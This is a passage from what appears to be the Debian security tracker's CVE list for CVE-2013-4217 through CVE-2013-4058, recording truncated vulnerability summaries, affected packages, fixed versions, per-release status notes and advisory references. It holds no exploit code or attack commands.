InfraStack/OSAgnostic/WiMax/Agen ...) - wimax-tools (bug #627975) CVE-2013-4217 (The OSAL_Crypt_SetEncryptedPassword function in InfraStack/OSDependent ...) - wimax-tools (bug #627975) CVE-2013-4216 (The Trace_OpenLogFile function in InfraStack/OSDependent/Linux/InfraSt ...) - wimax-tools (bug #627975) CVE-2013-4215 (The IPXPING_COMMAND in contrib/check_ipxping.c in Nagios Plugins 1.4.1 ...) - nagios-plugins 1.4.16+git20130902-1 (unimportant) NOTE: vulnerable code present, but check_ipxping is neither built nor installed - monitoring-plugins (Fixed before initial upload to Debian) NOTE: contrib/check_ipxping removed from src:monitoring-pluging before the NOTE: initial upload to Debian after the source package rename. CVE-2013-4214 (rss-newsfeed.php in Nagios Core 3.4.4, 3.5.1, and earlier, when MAGPIE ...) - nagios3 3.5.1-1 (low; bug #719056) [wheezy] - nagios3 (Minor issue) [squeeze] - nagios3 (html/rss-newsfeed.php not present) NOTE: fixed by removing html/rss-newsfeed.php completely NOTE: http://anonscm.debian.org/gitweb/?p=pkg-nagios/pkg-nagios3.git;a=commit;h=c88bef82308c99601732bb9517a1af5bc6928282 CVE-2013-4213 (Red Hat JBoss Enterprise Application Platform (EAP) 6.1.0 does not pro ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2013-4212 (Certain getText methods in the ActionSupport controller in Apache Roll ...) NOT-FOR-US: Apache Roller CVE-2013-4211 (A Code Execution Vulnerability exists in OpenX Ad Server 2.8.10 due to ...) NOT-FOR-US: OpenX CVE-2013-4210 (The org.jboss.remoting.transport.socket.ServerThread class in Red Hat ...) NOT-FOR-US: JBoss Remoting CVE-2013-4209 (Automatic Bug Reporting Tool (ABRT) before 2.1.6 allows local users to ...) NOT-FOR-US: abrt is Red Hat / Fedora specific CVE-2013-4208 (The rsa_verify function in PuTTY before 0.63 (1) does not clear sensit ...) {DSA-2736-1} - putty 0.63-1 - filezilla 3.7.3-1 (low; bug #719070) [squeeze] - filezilla (Minor issue) [wheezy] - filezilla (Minor issue) NOTE: http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/private-key-not-wiped.html CVE-2013-4207 (Buffer overflow in sshbn.c in PuTTY before 0.63 allows remote SSH serv ...) {DSA-2736-1} - putty 0.63-1 - filezilla 3.7.3-1 (low; bug #719070) [squeeze] - filezilla (Minor issue) [wheezy] - filezilla (Minor issue) NOTE: http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-bignum-division-by-zero.html CVE-2013-4206 (Heap-based buffer underflow in the modmul function in sshbn.c in PuTTY ...) {DSA-2736-1} - putty 0.63-1 - filezilla 3.7.3-1 (low; bug #719070) [squeeze] - filezilla (Minor issue) [wheezy] - filezilla (Minor issue) NOTE: http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-modmul.html CVE-2013-4205 (Memory leak in the unshare_userns function in kernel/user_namespace.c ...) - linux 3.10.7-1 [wheezy] - linux (Introduced in 3.8) - linux-2.6 (Introduced in 3.8) CVE-2013-4204 (Multiple cross-site scripting (XSS) vulnerabilities in the JUnit files ...) - gwt (low) [squeeze] - gwt (Minor issue) NOTE: http://www.gwtproject.org/release-notes.html#Release_Notes_2_5_1_RC1 CVE-2013-4203 (The self.run_gpg function in lib/rgpg/gpg_helper.rb in the rgpg gem be ...) NOT-FOR-US: Ruby Rgpg Gem CVE-2013-4202 (The (1) backup (api/contrib/backups.py) and (2) volume transfer (contr ...) - cinder 2013.1.2-4 (bug #719118) CVE-2013-4201 (Katello allows remote authenticated users to call the "system remove_d ...) NOT-FOR-US: Katello CVE-2013-4200 (The isURLInPortal method in the URLTool class in in_portal.py in Plone ...) NOT-FOR-US: Plone CVE-2013-4199 ((1) cb_decode.py and (2) linkintegrity.py in Plone 2.1 through 4.1, 4. ...) NOT-FOR-US: Plone CVE-2013-4198 (mail_password.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and 4. ...) NOT-FOR-US: Plone CVE-2013-4197 (member_portrait.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and ...) NOT-FOR-US: Plone CVE-2013-4196 (The object manager implementation (objectmanager.py) in Plone 2.1 thro ...) NOT-FOR-US: Plone CVE-2013-4195 (Multiple open redirect vulnerabilities in (1) marmoset_patch.py, (2) p ...) NOT-FOR-US: Plone CVE-2013-4194 (The WYSIWYG component (wysiwyg.py) in Plone 2.1 through 4.1, 4.2.x thr ...) NOT-FOR-US: Plone CVE-2013-4193 (typeswidget.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and 4.3. ...) NOT-FOR-US: Plone CVE-2013-4192 (sendto.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and 4.3.x thr ...) NOT-FOR-US: Plone CVE-2013-4191 (zip.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and 4.3.x throug ...) NOT-FOR-US: Plone CVE-2013-4190 (Multiple cross-site scripting (XSS) vulnerabilities in (1) spamProtect ...) NOT-FOR-US: Plone CVE-2013-4189 (Multiple unspecified vulnerabilities in (1) dataitems.py, (2) get.py, ...) NOT-FOR-US: Plone CVE-2013-4188 (traverser.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and 4.3.x ...) NOT-FOR-US: Plone CVE-2013-4187 (The Flippy module 7.x-1.x before 7.x-1.2 for Drupal does not properly ...) NOT-FOR-US: Flippy Contributed Drupal module CVE-2013-4186 REJECTED CVE-2013-4185 (Algorithmic complexity vulnerability in OpenStack Compute (Nova) befor ...) - nova 2013.1.2-3 (low; bug #718907) [wheezy] - nova (Minor issue) CVE-2013-4184 (Perl module Data::UUID from CPAN version 1.219 vulnerable to symlink a ...) - libdata-uuid-perl (unimportant; bug #718949) NOTE: https://github.com/rjbs/Data-UUID/issues/5 NOTE: Neutralised by kernel temp hardening CVE-2013-4183 (The clear_volume function in LVMVolumeDriver driver in OpenStack Cinde ...) - cinder 2013.1.2-4 (bug #719010) CVE-2013-4182 (app/controllers/api/v1/hosts_controller.rb in Foreman before 1.2.2 doe ...) - foreman (bug #663101) CVE-2013-4181 (Cross-site scripting (XSS) vulnerability in the addAlert function in t ...) NOT-FOR-US: ovirt CVE-2013-4180 (The (1) power and (2) ipmi_boot actions in the HostController in Forem ...) - foreman (bug #663101) CVE-2013-4179 (The security group extension in OpenStack Compute (Nova) Grizzly 2013. ...) - nova 2013.1.3-1 [wheezy] - nova (Vulnerable code not present) NOTE: CVE for incomplete fix applied for CVE-2013-1664 CVE-2013-4178 (The Google Authenticator login module 6.x-1.x before 6.x-1.2 and 7.x-1 ...) NOT-FOR-US: GA Login Drupal contributed module CVE-2013-4177 (The Google Authenticator login module 6.x-1.x before 6.x-1.2 and 7.x-1 ...) NOT-FOR-US: GA Login Drupal contributed module CVE-2013-4176 (mysecureshell 1.31: Local Information Disclosure Vulnerability ...) NOT-FOR-US: MySecureShell CVE-2013-4175 (MySecureShell 1.31 has a Local Denial of Service Vulnerability ...) NOT-FOR-US: MySecureShell CVE-2013-4174 (Multiple cross-site scripting (XSS) vulnerabilities in the Scald modul ...) NOT-FOR-US: Scald Drupal contributed module CVE-2013-4173 (Directory traversal vulnerability in the trend-data daemon (xymond_rrd ...) - xymon 4.3.17-2 (bug #717895) [wheezy] - xymon (Not remotely exploitable in Debian default config) [squeeze] - xymon (Not remotely exploitable in Debian default config) CVE-2013-4172 (The Red Hat CloudForms Management Engine 5.1 allow remote administrato ...) NOT-FOR-US: RedHat CloudForms Management Engine CVE-2013-4171 (Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller b ...) NOT-FOR-US: Apache Roller CVE-2013-4170 RESERVED CVE-2013-4169 (GNOME Display Manager (gdm) before 2.21.1 allows local users to change ...) - gdm (unimportant) - gdm3 (Only affected older gdm < 2.21.1) NOTE: In Debian /tmp/.X11-unix is created by /etc/init.d/x11-common CVE-2013-4168 (Cross-site scripting (XSS) vulnerability in SmokePing 2.6.9 in the sta ...) {DLA-348-1} - smokeping 2.6.8-2 (low) [squeeze] - smokeping (Minor issue) NOTE: https://github.com/oetiker/SmokePing/commit/bad9f9c28f0939b269f90072aa4cf41f20f15563 CVE-2013-4167 (Cross-site scripting (XSS) vulnerability in CMS Made Simple (CMSMS) be ...) - cmsms (bug #608888) CVE-2013-4166 (The gpg_ctx_add_recipient function in camel/camel-gpg-context.c in GNO ...) - evolution (unimportant) NOTE: Regular UI bug, not a security issue. CVE-2013-4165 (The HTTPAuthorized function in bitcoinrpc.cpp in bitcoind 0.8.1 provid ...) - bitcoin 0.8.4-1 (bug #717828) NOTE: https://github.com/bitcoin/bitcoin/issues/2838 CVE-2013-4164 (Heap-based buffer overflow in Ruby 1.8, 1.9 before 1.9.3-p484, 2.0 bef ...) {DSA-2810-1 DSA-2809-1} - ruby1.8 1.8.7.358-9 (bug #730189) - ruby1.9.1 1.9.3.484-1 (bug #730178) - ruby2.0 2.0.0.353-1 (bug #730190) NOTE: https://www.ruby-lang.org/en/news/2013/11/22/heap-overflow-in-floating-point-parsing-cve-2013-4164/ CVE-2013-4163 (The ip6_append_data_mtu function in net/ipv6/ip6_output.c in the IPv6 ...) {DSA-2745-1} - linux 3.10.5-1 - linux-2.6 (Introduced in 3.5) CVE-2013-4162 (The udp_v6_push_pending_frames function in net/ipv6/udp.c in the IPv6 ...) {DSA-2906-1 DSA-2745-1} - linux 3.10.5-1 (low) - linux-2.6 (low) CVE-2013-4161 (gksu-polkit-0.0.3-6.fc18 was reported as fixing the issue in CVE-2012- ...) - gksu-polkit (CVE for improperly applied fix for CVE-2012-5617 on Red Hat) CVE-2013-4160 (Little CMS (lcms2) before 2.5, as used in OpenJDK 7 and possibly other ...) - lcms 1.19.dfsg1-1.3 (low; bug #728208) [squeeze] - lcms (Minor issue) [wheezy] - lcms 1.19.dfsg2-1.2+deb7u1 - lcms2 2.2+git20110628-2.3 (bug #714529) [wheezy] - lcms2 2.2+git20110628-2.2+deb7u1 NOTE: https://github.com/mm2/Little-CMS/commit/91c2db7f2559be504211b283bc3a2c631d6f06d9 NOTE: https://bugzilla.suse.com/show_bug.cgi?id=826097#c9 CVE-2013-4159 (ctdb before 2.3 in OpenSUSE 12.3 and 13.1 does not create temporary fi ...) - ctdb 2.5.1+debian0-1 (bug #749840) [wheezy] - ctdb (Minor issue) [squeeze] - ctdb (Minor issue) CVE-2013-4158 (smokeping before 2.6.9 has XSS (incomplete fix for CVE-2012-0790) ...) - smokeping (fix for CVE-2012-0790/DSA-2651-1 uses regexp from 2.6.9 upstream release) NOTE: CVE is for incomplete fix for CVE-2012-0790 NOTE: Debian package applied already the more complete fix, see #659899 CVE-2013-4157 (Red Hat Storage 2.0 allows local users to overwrite arbitrary files vi ...) NOT-FOR-US: Red Hat Storage Server CVE-2013-4156 (Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to caus ...) - libreoffice 1:4.1.0-1 (unimportant) [wheezy] - libreoffice (Minor issue) - openoffice.org (unimportant) NOTE: Harmless crash CVE-2013-4155 (OpenStack Swift before 1.9.1 in Folsom, Grizzly, and Havana allows aut ...) {DSA-2737-1} - swift 1.8.0-7 (bug #719008) CVE-2013-4154 (The qemuAgentCommand function in libvirt before 1.1.1, when a guest ag ...) - libvirt 1.1.0-4 (low; bug #717355) [squeeze] - libvirt (only affects >= 1.1.0) [wheezy] - libvirt (only affects >= 1.1.0) NOTE: Introduced by http://libvirt.org/git/?p=libvirt.git;a=commitdiff;h=d47eff88fe50e43a36671f6d8d0eeda52835d5e0 (v1.1.0) NOTE: http://openwall.com/lists/oss-security/2013/07/19/12 CVE-2013-4153 (Double free vulnerability in the qemuAgentGetVCPUs function in qemu/qe ...) - libvirt 1.1.0-4 (bug #717354) [squeeze] - libvirt (Introduced in 1.0.6) [wheezy] - libvirt (Introduced in 1.0.6) NOTE: http://openwall.com/lists/oss-security/2013/07/19/11 CVE-2013-4152 (The Spring OXM wrapper in Spring Framework before 3.2.4 and 4.0.0.M1, ...) {DSA-2842-1} - libspring-java 3.0.6.RELEASE-10 (low; bug #720902) CVE-2013-4151 (The virtio_load function in virtio/virtio.c in QEMU 1.x before 1.7.2 a ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4150 (The virtio_net_load function in hw/net/virtio-net.c in QEMU 1.5.0 thro ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4149 (Buffer overflow in virtio_net_load function in net/virtio-net.c in QEM ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4148 (Integer signedness error in the virtio_net_load function in hw/net/vir ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4147 (Multiple format string vulnerabilities in Yet Another Radius Daemon (Y ...) - yardradius (low; bug #714612) [squeeze] - yardradius (Minor issue) [wheezy] - yardradius (Minor issue) CVE-2013-4146 RESERVED CVE-2013-4145 REJECTED CVE-2013-4144 RESERVED CVE-2013-4143 (The (1) checkPasswd and (2) checkGroupXlockPasswds functions in xlockm ...) - xlockmore NOTE: http://openwall.com/lists/oss-security/2013/07/16/8 CVE-2013-4142 REJECTED CVE-2013-4141 REJECTED CVE-2013-4140 (Cross-site scripting (XSS) vulnerability in the TinyBox (Simple Splash ...) NOT-FOR-US: TinyBox Drupal contributed module CVE-2013-4139 (The Stage File Proxy module 7.x-1.x before 7.x-1.4 for Drupal allows r ...) NOT-FOR-US: Stage File Proxy Drupal contributed module CVE-2013-4138 (Cross-site scripting (XSS) vulnerability in the Hatch theme 7.x-1.x be ...) NOT-FOR-US: Hatch Drupal contributed module CVE-2013-4137 (Multiple SQL injection vulnerabilities in StatusNet 1.0 before 1.0.2 a ...) - statusnet (bug #491723) CVE-2013-4136 (ext/common/ServerInstanceDir.h in Phusion Passenger gem before 4.0.6 f ...) - passenger 3.0.13debian-1.2 - ruby-passenger 3.0.13debian-1.2 (low; bug #717176) [squeeze] - passenger (minor, local, issue) [wheezy] - ruby-passenger 3.0.13debian-1+deb7u1 CVE-2013-4135 (The vos command in OpenAFS 1.6.x before 1.6.5, when using the -encrypt ...) {DSA-2729-1} - openafs 1.6.5-1 CVE-2013-4134 (OpenAFS before 1.4.15, 1.6.x before 1.6.5, and 1.7.x before 1.7.26 use ...) {DSA-2729-1} - openafs 1.6.5-1 CVE-2013-4133 (kde-workspace before 4.10.5 has a memory leak in plasma desktop ...) - kde-workspace 4:4.10.5-3 (unimportant; bug #717180) NOTE: https://bugs.kde.org/show_bug.cgi?id=314919 NOTE: Plain bug, security implication rather far-fetched CVE-2013-4132 (KDE-Workspace 4.10.5 and earlier does not properly handle the return v ...) - kde-workspace 4:4.10.5-3 (bug #717180) [wheezy] - kde-workspace (Only exploitable with glibc 2.17) - kdebase-workspace (Only exploitable with glibc 2.17) NOTE: https://git.reviewboard.kde.org/r/111261/ NOTE: https://projects.kde.org/projects/kde/kde-workspace/repository/revisions/45b7f137fbc0b942fd2c9b4e8d8c1f0293e64ba7 NOTE: only relevant with eglibc >= 2.17. CVE-2013-4131 (The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through ...) - subversion 1.7.13-1 (bug #717794) [squeeze] - subversion (Only affects >= 1.7) [wheezy] - subversion (Only affects >= 1.7) CVE-2013-4130 (The (1) red_channel_pipes_add_type and (2) red_channel_pipes_add_empty ...) {DSA-2839-1} - spice 0.12.4-0nocelt1 (low; bug #717030) [wheezy] - spice (Minor issue) CVE-2013-4129 (The bridge multicast implementation in the Linux kernel through 3.10.3 ...) - linux (Introduced in 3.11-rc1) - linux-2.6 (Introduced in 3.11-rc1) CVE-2013-4128 (Red Hat JBoss Enterprise Application Platform (EAP) 6.1.0 does not pro ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2013-4127 (Use-after-free vulnerability in the vhost_net_set_backend function in ...) - linux 3.10.5-1 [wheezy] - linux (Introduced in 3.8) - linux-2.6 (Introduced in 3.8) CVE-2013-4126 RESERVED CVE-2013-4125 (The fib6_add_rt2node function in net/ipv6/ip6_fib.c in the IPv6 stack ...) - linux 3.10.5-1 [wheezy] - linux (Introduced in 3.7) - linux-2.6 (Introduced in 3.7) CVE-2013-4124 (Integer overflow in the read_nttrans_ea_list function in nttrans.c in ...) - samba 2:3.6.17-1 (low) [wheezy] - samba 2:3.6.6-6+deb7u1 [squeeze] - samba 2:3.5.6~dfsg-3squeeze10 - samba4 (low) [wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1 NOTE: https://www.samba.org/samba/security/CVE-2013-4124 NOTE: samba as per 2:4.0.9+dfsg-2 is the first upload of the unified samba 4.x package to unstable. NOTE: Issue also fixed in 4.0.8 upstream, thus the fix still contained in 4.x in unstable CVE-2013-4123 (client_side_request.cc in Squid 3.2.x before 3.2.13 and 3.3.x before 3 ...) - squid (Only affects 3.2 onwards) - squid3 3.3.8-1 (bug #716743) [wheezy] - squid3 (Only affects 3.2 onwards) [squeeze] - squid3 (Only affects 3.2 onwards) NOTE: http://www.squid-cache.org/Advisories/SQUID-2013_3.txt CVE-2013-4122 (Cyrus SASL 2.1.23, 2.1.26, and earlier does not properly handle when a ...) {DSA-3368-1} - cyrus-sasl2 2.1.26.dfsg1-14 (bug #716835; bug #784112) [wheezy] - cyrus-sasl2 (Only exploitable with eglibc 2.17 and later) [squeeze] - cyrus-sasl2 (Only exploitable with eglibc 2.17 and later) NOTE: http://openwall.com/lists/oss-security/2013/07/12/3 NOTE: http://git.cyrusimap.org/cyrus-sasl/commit/?id=dedad73e5e7a75d01a5f3d5a6702ab8ccd2ff40d NOTE: https://bugzilla.cyrusimap.org/show_bug.cgi?id=3803 NOTE: https://bugzilla.cyrusimap.org/show_bug.cgi?id=3806 NOTE: Was originally already fixed in 2.1.25.dfsg1-14 (cf. #716835) CVE-2013-4121 REJECTED CVE-2013-4120 (Katello has a Denial of Service vulnerability in API OAuth authenticat ...) NOT-FOR-US: Katello CVE-2013-4119 (FreeRDP before 1.1.0-beta+2013071101 allows remote attackers to cause ...) - freerdp (The server part is not build) NOTE: https://github.com/FreeRDP/FreeRDP/commit/0773bb9303d24473fe1185d85a424dfe159aff53 NOTE: Server disabled: option(WITH_SERVER "Build server binaries" OFF) in CMakeLists.txt CVE-2013-4118 (FreeRDP before 1.1.0-beta1 allows remote attackers to cause a denial o ...) - freerdp (The server part is not build) NOTE: https://github.com/FreeRDP/FreeRDP/commit/7d58aac24fe20ffaad7bd9b40c9ddf457c1b06e7 NOTE: Server disabled: option(WITH_SERVER "Build server binaries" OFF) in CMakeLists.txt CVE-2013-4117 (Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php i ...) NOT-FOR-US: WordPress plugin category-grid-view-gallery CVE-2013-4116 (lib/npm.js in Node Packaged Modules (npm) before 1.3.3 allows local us ...) - npm 1.3.10~dfsg-1 (bug #715325) NOTE: Upstream fix https://github.com/isaacs/npm/commit/f4d31693 NOTE: https://github.com/isaacs/npm/issues/3635 CVE-2013-4115 (Buffer overflow in the idnsALookup function in dns_internal.cc in Squi ...) - squid (Only affects 3.2 onwards) - squid3 3.3.8-1 (bug #716743) [wheezy] - squid3 (Only affects 3.2 onwards) [squeeze] - squid3 (Only affects 3.2 onwards) NOTE: http://www.squid-cache.org/Advisories/SQUID-2013_2.txt CVE-2013-4114 (The automatic update request in Nagstamont before 0.9.10 uses a cleart ...) - nagstamon 0.9.9-2 (low; bug #716718) [wheezy] - nagstamon (Minor issue) [squeeze] - nagstamon (Minor issue) NOTE: update checks are disabled in Debian by default, see debian/patches/check-for-new-version.patch CVE-2013-4113 (ext/xml/xml.c in PHP before 5.3.27 does not properly consider parsing ...) {DSA-2723-1} - php5 5.5.0+dfsg-15 (bug #717139) CVE-2013-4112 (The DiagnosticsHandler in JGroup 3.0.x, 3.1.x, 3.2.x before 3.2.9, and ...) - libjgroups-java 2.12.2.Final-4 (bug #717031) [wheezy] - libjgroups-java (Minor issue) [squeeze] - libjgroups-java (Minor issue) NOTE: libjgroups-java/2.12.2.Final-4 disables diagnostic probing by default CVE-2013-4111 (The Python client library for Glance (python-glanceclient) before 0.10 ...) - python-glanceclient 1:0.9.0-2 (bug #718282) CVE-2013-4110 (Cryptocat has an Unspecified Chat Participant User List Disclosure ...) NOT-FOR-US: Cryptocat CVE-2013-4109 (An unspecified cross-site scripting (XSS) vulnerability exists in Cryp ...) NOT-FOR-US: Cryptocat CVE-2013-4108 (Multiple unspecified vulnerabilities in Cryptocat Project Cryptocat 2. ...) NOT-FOR-US: Cryptocat CVE-2013-4107 (Cryptocat before 2.0.22: cryptocat.js handlePresence() has cross site ...) NOT-FOR-US: Cryptocat CVE-2013-4106 (A Cross-site scripting (XSS) vulnerability exists in Conversation Over ...) NOT-FOR-US: Cryptocat CVE-2013-4105 (Cryptocat before 2.0.22 has Multiparty Encryption Scheme Information D ...) NOT-FOR-US: Cryptocat CVE-2013-4104 (Cryptocat before 2.0.22 has weak encryption in the Socialist Millionna ...) NOT-FOR-US: Cryptocat CVE-2013-4103 (Cryptocat before 2.0.22 has Remote Script Injection due to improperly ...) NOT-FOR-US: Cryptocat CVE-2013-4102 (Cryptocat before 2.0.22 strophe.js Math.random() Random Number Generat ...) NOT-FOR-US: Cryptocat CVE-2013-4101 (Cryptocat before 2.0.22 Link Markup Decorator HTML Handling Weakness ...) NOT-FOR-US: Cryptocat CVE-2013-4100 (Cryptocat before 2.0.22 has Remote Denial of Service via username ...) NOT-FOR-US: Cryptocat CVE-2013-4099 (Multiple unspecified vulnerabilities in OpenAL32.dll in JOAL 2.0-rc11, ...) NOT-FOR-US: JOGAMP CVE-2013-4098 (ServerAdmin/ErrorViewer.jsp in DS3 Authentication Server allow remote ...) NOT-FOR-US: DS3 Authentication Server CVE-2013-4097 (ServerAdmin/TestDRConnection.jsp in DS3 Authentication Server allows r ...) NOT-FOR-US: DS3 Authentication Server CVE-2013-4096 (ServerAdmin/TestTelnetConnection.jsp in DS3 Authentication Server allo ...) NOT-FOR-US: DS3 Authentication Server CVE-2013-4095 (plain/actionsets.html in the SecureSphere Operations Manager (SOM) Man ...) NOT-FOR-US: Imperva SecureSphere CVE-2013-4094 (The Key Management feature in the SecureSphere Operations Manager (SOM ...) NOT-FOR-US: Imperva SecureSphere CVE-2013-4093 (The SecureSphere Operations Manager (SOM) Management Server in Imperva ...) NOT-FOR-US: Imperva SecureSphere CVE-2013-4092 (The SecureSphere Operations Manager (SOM) Management Server in Imperva ...) NOT-FOR-US: Imperva SecureSphere CVE-2013-4091 (The SecureSphere Operations Manager (SOM) Management Server in Imperva ...) NOT-FOR-US: Imperva SecureSphere CVE-2013-4090 (Varnish HTTP cache before 3.0.4: ACL bug ...) - varnish 3.0.4-1 NOTE: https://varnish-cache.org/lists/pipermail/varnish-announce/2013-June/000684.html CVE-2013-4089 RESERVED CVE-2013-4088 (Kernel/Modules/AgentTicketWatcher.pm in Open Ticket Request System (OT ...) {DSA-2712-1} - otrs2 3.2.8-1 [squeeze] - otrs2 2.4.9+dfsg1-3+squeeze4 NOTE: DSA-2733-1 NOTE: http://web.archive.org/web/20130827134500/http://www.otrs.com:80/en/open-source/community-news/security-advisories/security-advisory-2013-04/ CVE-2013-4087 RESERVED CVE-2013-4086 RESERVED CVE-2013-4085 RESERVED CVE-2013-4084 RESERVED CVE-2013-4083 (The dissect_pft function in epan/dissectors/packet-dcp-etsi.c in the D ...) {DSA-2709-1} - wireshark 1.10.0-1 (bug #711918) [squeeze] - wireshark 1.2.11-6+squeeze11 NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8717 CVE-2013-4082 (The vwr_read function in wiretap/vwr.c in the Ixia IxVeriWave file par ...) {DSA-2709-1} - wireshark 1.10.0-1 (bug #711918) [squeeze] - wireshark (Only affects 1.8+) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8760 CVE-2013-4081 (The http_payload_subdissector function in epan/dissectors/packet-http. ...) {DSA-2709-1} - wireshark 1.10.0-1 (unimportant; bug #711918) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8733 NOTE: Not suitable for code injection CVE-2013-4080 (The dissect_r3_upstreamcommand_queryconfig function in epan/dissectors ...) {DLA-497-1} - wireshark 1.10.0-1 (unimportant; bug #711918) NOTE: no code injection, not treated as a security issue, see README.Debian.security [squeeze] - wireshark (Only affects 1.8+) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8764 CVE-2013-4079 (The dissect_schedule_message function in epan/dissectors/packet-gsm_cb ...) {DLA-497-1} - wireshark 1.10.0-1 (unimportant; bug #711918) NOTE: no code injection, not treated as a security issue, see README.Debian.security [squeeze] - wireshark (Only affects 1.8+) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8730 CVE-2013-4078 (epan/dissectors/packet-rdp.c in the RDP dissector in Wireshark 1.8.x b ...) {DSA-2709-1} - wireshark 1.10.0-1 (bug #711918) [squeeze] - wireshark (Only affects 1.8+) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7862 NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8729 CVE-2013-4077 (Array index error in the NBAP dissector in Wireshark 1.8.x before 1.8. ...) {DSA-2709-1} - wireshark 1.10.0-1 (bug #711918) [squeeze] - wireshark (Only affects 1.8+) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8697 CVE-2013-4076 (Buffer overflow in the dissect_iphc_crtp_fh function in epan/dissector ...) {DSA-2709-1} - wireshark 1.10.0-1 (bug #711918) [squeeze] - wireshark (Only affects 1.8+) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7880 NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8727 CVE-2013-4075 (epan/dissectors/packet-gmr1_bcch.c in the GMR-1 BCCH dissector in Wire ...) {DSA-2709-1} - wireshark 1.10.0-1 (bug #711918) [squeeze] - wireshark (Only affects 1.8+) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7664 NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8726 CVE-2013-4074 (The dissect_capwap_data function in epan/dissectors/packet-capwap.c in ...) {DSA-2709-1} - wireshark 1.10.0-1 (bug #711918) [squeeze] - wireshark (Vulnerable code not present) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8725 CVE-2013-4073 (The OpenSSL::SSL.verify_certificate_identity function in lib/openssl/s ...) {DSA-2809-1 DSA-2738-1} - ruby1.8 1.8.7.358-7.1 (bug #714541) - ruby1.9.1 1.9.3.194-8.2 (bug #714543) - puppet (Only affects Puppet Enterprise) NOTE: http://www.ruby-lang.org/en/news/2013/06/27/hostname-check-bypassing-vulnerability-in-openssl-client-cve-2013-4073/ NOTE: https://github.com/ruby/ruby/commit/2669b84d407ab431e965145c827db66c91158f89 (1.9.3) NOTE: https://github.com/ruby/ruby/commit/961bf7496ded3acfe847cf56fa90bbdcfd6e614f (1.8.7) NOTE: Regression with patch: https://bugs.ruby-lang.org/issues/8575 NOTE: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?revision=41812&view=revision CVE-2013-4072 RESERVED CVE-2013-4071 RESERVED CVE-2013-4070 (The Portal application in IBM SPSS Collaboration and Deployment Servic ...) NOT-FOR-US: IBM SPSS Collaboration and Deployment Services CVE-2013-4069 (The Portal application in IBM SPSS Collaboration and Deployment Servic ...) NOT-FOR-US: IBM SPSS Collaboration and Deployment Services CVE-2013-4068 (Buffer overflow in iNotes in IBM Domino 8.5.3 before FP5 IF1 and 9.0 b ...) NOT-FOR-US: IBM CVE-2013-4067 (IBM InfoSphere Information Server 8.0, 8.1, 8.5 through FP3, 8.7, and ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2013-4066 (IBM InfoSphere Information Server 8.0, 8.1, 8.5 through FP3, 8.7, and ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2013-4065 (Cross-site scripting (XSS) vulnerability in iNotes in IBM Domino 8.5.x ...) NOT-FOR-US: iNotes in IBM Domino CVE-2013-4064 (Cross-site scripting (XSS) vulnerability in iNotes in IBM Domino 8.5.x ...) NOT-FOR-US: iNotes in IBM Domino CVE-2013-4063 (Cross-site scripting (XSS) vulnerability in iNotes in IBM Domino 8.5.x ...) NOT-FOR-US: iNotes in IBM Domino CVE-2013-4062 (IBM Rational Policy Tester 8.5 before 8.5.0.5 does not verify X.509 ce ...) NOT-FOR-US: IBM CVE-2013-4061 (IBM Rational Policy Tester 8.5 before 8.5.0.5 does not properly check ...) NOT-FOR-US: IBM CVE-2013-4060 RESERVED CVE-2013-4059 (Multiple cross-site scripting (XSS) vulnerabilities in IBM InfoSphere ...) NOT-FOR-US: IBM InfoSphere CVE-2013-4058 (Multiple SQL injection vulnerabilities in IBM InfoSphere Information S ...) 